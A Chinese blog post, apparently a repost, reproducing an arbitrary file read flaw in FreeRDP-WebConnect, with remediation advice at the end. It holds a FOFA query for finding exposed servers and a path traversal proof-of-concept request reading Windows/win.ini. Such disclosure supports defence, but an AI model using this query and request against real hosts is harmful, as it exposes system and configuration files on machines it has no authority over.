热门标签
热门文章
- 1数字乡村创新实践探索农业现代化与农村治理现代化新路径:科技赋能农村全面振兴与农民幸福生活
- 2android screenshot流程,APP中,Screenshot的设计要领和各发布渠道的要求
- 3第三章:深入浅出理解分布式一致性协议Gossip和Redis集群原理_分布式一致性协议 gossip 和 redis 集群原理解析_redis集
- 4DAOS引擎启动流程-源码分析_daos aggregate
- 5Ferret — Go 语言实现的声明式 Web 爬虫系统
- 6【快速入门】eNSP华为交换机简单配置(附缩写总结)_华为交换机配置教程
- 7使用swift实现泡泡聊天框
- 8墨水屏电子床头卡在医院病房中应用方案介绍_电子床头卡 运作原理
- 9IntelliJ IDEA创建一个spark的项目_idea创建javaspark项目
- 10python学习之【继承、封装、多态】
当前位置: article > 正文
FreeRDP WebConnect Url 任意文件读取漏洞复现_freerdp webconnect 端口
作者:你好赵伟 | 2024-04-11 03:54:18
赞
踩
freerdp webconnect 端口
0x01 产品简介
FreeRDP-WebConnect 是一个开源HTML5代理,它提供对使用RDP的任何Windows服务器和工作站的Web访问。
0x02 漏洞概述
FreeRDP WebConnect Url 接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 复现环境
FOFA:body="css/vkb.css" || body="Advanced session parameters"
0x04 漏洞复现
PoC
- GET /../../../../../../../../Windows/win.ini HTTP/1.1
- Host: your-ip
- Accept-Encoding: gzip
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0x05 修复建议
官方已修复该漏洞,请用户联系厂商修复漏洞:https://github.com/FreeRDP/FreeRDP-WebConnect
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/402753
推荐阅读
相关标签
